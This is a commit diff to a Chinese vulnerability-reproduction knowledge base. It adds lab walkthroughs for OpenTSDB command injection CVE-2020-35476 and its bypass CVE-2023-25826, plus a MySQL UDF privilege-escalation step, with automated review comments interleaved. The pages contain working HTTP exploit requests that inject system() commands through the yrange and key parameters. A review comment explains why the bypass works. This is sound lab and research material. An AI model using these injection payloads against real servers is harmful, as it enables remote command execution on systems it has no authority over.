update opentsdb cve-2020-35476 & cve-2023-25826
Threekiii committed Mar 7, 2024
1 parent 7ad4a15 commit 263d632
Showing 19 changed files with 196 additions and 3 deletions.
5 changes: 3 additions & 2 deletions docs-base/docs/README.md
Original file line number Diff line number Diff line change
@@ -11,6 +11,9 @@

**【最近更新】**

- 2024.03.07
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-21351.md
- Vulhub/XStream-反序列化命令执行漏洞-CVE-2021-29505.md
- 2024.02.26
- Vulhub/Adobe-ColdFusion-XML-反序列化命令执行漏洞-CVE-2023-29300.md
- Vulhub/Adobe-ColdFusion-本地文件包含漏洞-CVE-2023-26360.md
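Review bot: the new 2024.03.07 entry in the 最近更新 list names the two XStream documents, but the files this commit actually adds are docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md and docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md (see the sidebar hunks and the commit message). Either add those two OpenTSDB lines under 2024.03.07 or move the XStream lines to the commit that added those pages, so the changelog stays an accurate record of what changed.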
@@ -20,8 +23,6 @@
- Vulhub/Jenkins-CLI-接口任意文件读取漏洞-CVE-2024-23897.md
- Vulhub/Jetbrains-TeamCity-认证绕过导致远程命令执行漏洞-CVE-2023-42793.md
- Vulhub/MeterSphere-v1.15.4-认证用户SQL注入漏洞-CVE-2021-45788.md


- 2024.01.31
- OA漏洞/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md
- 开发框架漏洞/Apache-Commons-Configuration-远程命令执行漏洞-CVE-2022-33980.md
2 changes: 2 additions & 0 deletions docs-base/docs/_sidebar.md
@@ -157,6 +157,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
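Review bot: the same two OpenTSDB entries are added by hand in three separate lists in this commit (docs/_sidebar.md, docs/vulhub/README.md and docs/vulhub/_sidebar.md), and the README.md changelog hunk above already shows how easily hand-maintained copies drift. Consider generating the vulhub list from one source, or at least adding a check that the three lists stay identical. The placement after the OpenSSL entry and the relative `vulhub/...` link paths are consistent with the neighbouring lines.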
7 changes: 6 additions & 1 deletion docs-base/docs/appserver/MySQL-UDF提权.md
@@ -18,6 +18,12 @@ UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数

## 漏洞复现

查看 secure_file_priv:

```
show variables like "secure_file_priv";
```

寻找插件目录,将 UDF 的动态链接库文件放到 MySQL 的插件目录:

```
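Review bot: the added `show variables like "secure_file_priv";` uses double quotes around a string literal; when MySQL runs with the `ANSI_QUOTES` SQL mode, double quotes delimit identifiers and the statement fails. Prefer `show variables like 'secure_file_priv';`. The step also tells the reader to check the variable without saying what the result means for the rest of the procedure; one sentence covering the three cases (an empty value places no restriction on file writes, `NULL` disables file import/export entirely, and a directory path restricts writes to that directory) would make the check actionable, since a `NULL` value means the later step of placing the shared library via MySQL cannot succeed.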
@@ -80,4 +86,3 @@ Query OK, 0 rows affected (0.00 sec)
mysql> select * from func;
Empty set (0.00 sec)
```

@@ -0,0 +1,77 @@
# OpenTSDB 命令注入漏洞 CVE-2020-35476

## 漏洞描述

OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。

参考链接:

- [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051)
- [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)

## 环境搭建

Vulhub 执行如下命令启动一个 OpenTSDB 2.4.0:

```
docker compose up -d
```

服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165806970.png)

## 漏洞复现

利用这个漏洞需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165830409.png)

这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以我们可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:

```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 1346846400,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307165935912.png)

如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。再次查看 metric 列表,metric 已经创建完成:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170059167.png)

发送如下数据包,其中参数`m`的值必须包含一个有数据的 metric:

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170532492.png)

进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2020-35476/image-20240307170625205.png)
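Review bot: the `POST /api/put/` request in this page sends a JSON body but declares `Content-Type: application/x-www-form-urlencoded` and a fixed `Content-Length: 150`, and the body follows the last header with no blank line. Readers who replay the request as written will get a rejected or truncated body; use `Content-Type: application/json`, let the Content-Length match the body actually sent (or omit it), and insert the blank line between headers and body. In 漏洞描述, "Hbase" should be "HBase", and it would help to state that the fix shipped in 2.4.1 was incomplete and is bypassed by CVE-2023-25826 (as the companion page in this commit explains), so a reader does not treat 2.4.1 as a safe version. Also, this page uses `docker compose up -d` while the CVE-2023-25826 page uses `docker-compose up -d`; pick one form for both.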
104 changes: 104 additions & 0 deletions docs-base/docs/vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md
@@ -0,0 +1,104 @@
# OpenTSDB 命令注入漏洞 CVE-2023-25826

## 漏洞描述

OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。

参考链接:

- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/)
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)

## 环境搭建

Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1:

```
docker-compose up -d
```

服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png)

## 漏洞复现

这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。

这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:

```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 972388800,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png)

如果目标 OpenTSDB 存在 metric,且不为空,则无需上述步骤。

发送 CVE-2020-35476 payload :

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

将返回错误:

```
{"err":"'yrange' was invalid. Must be in the format [min:max]."}
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png)

CVE-2023-25826 绕过修复的一个点,在参数 key 这里:

```shell
# CVE-2020-35476
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json

# CVE-2023-25826
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
```

发送数据包:

```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png)

进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:

![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png)
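Review bot: the paragraph introducing the bypass ("绕过修复的一个点,在参数 key 这里") shows the two URLs side by side but does not say why the second one works; one sentence would close the gap: the 2.4.1 fix validates `yrange`/`y2range` against the `[min:max]` format (the error shown above), but the `key` parameter reaches the same graph-rendering code path without that validation, and the `%3B` (`;`) at the start of its value terminates the preceding statement so the remainder is interpreted as a command. The description paragraph also has stray spaces before "2.4.1" and "这个漏洞", and since PR #2275 is cited as the fix, state which release contains it so readers know what to upgrade to. Same request-format issue as the CVE-2020-35476 page: the `POST /api/put/` example pairs a JSON body with `Content-Type: application/x-www-form-urlencoded`, a fixed `Content-Length: 150`, and no blank line before the body. Finally, `docker-compose up -d` here versus `docker compose up -d` in the other page should be made consistent.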
2 changes: 2 additions & 0 deletions docs-base/docs/vulhub/README.md
@@ -158,6 +158,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)
2 changes: 2 additions & 0 deletions docs-base/docs/vulhub/_sidebar.md
@@ -157,6 +157,8 @@
* [OpenSMTPD-远程命令执行漏洞-CVE-2020-7247](vulhub/OpenSMTPD-远程命令执行漏洞-CVE-2020-7247.md)
* [OpenSSH-用户名枚举漏洞-CVE-2018-15473](vulhub/OpenSSH-用户名枚举漏洞-CVE-2018-15473.md)
* [OpenSSL-心脏出血漏洞-CVE-2014-0160](vulhub/OpenSSL-心脏出血漏洞-CVE-2014-0160.md)
* [OpenTSDB-命令注入漏洞-CVE-2020-35476](vulhub/OpenTSDB-命令注入漏洞-CVE-2020-35476.md)
* [OpenTSDB-命令注入漏洞-CVE-2023-25826](vulhub/OpenTSDB-命令注入漏洞-CVE-2023-25826.md)
* [PHP-FPM-Fastcgi-未授权访问漏洞](vulhub/PHP-FPM-Fastcgi-未授权访问漏洞.md)
* [PHP-FPM-远程代码执行漏洞-CVE-2019-11043](vulhub/PHP-FPM-远程代码执行漏洞-CVE-2019-11043.md)
* [PostgreSQL-提权漏洞-CVE-2018-1058](vulhub/PostgreSQL-提权漏洞-CVE-2018-1058.md)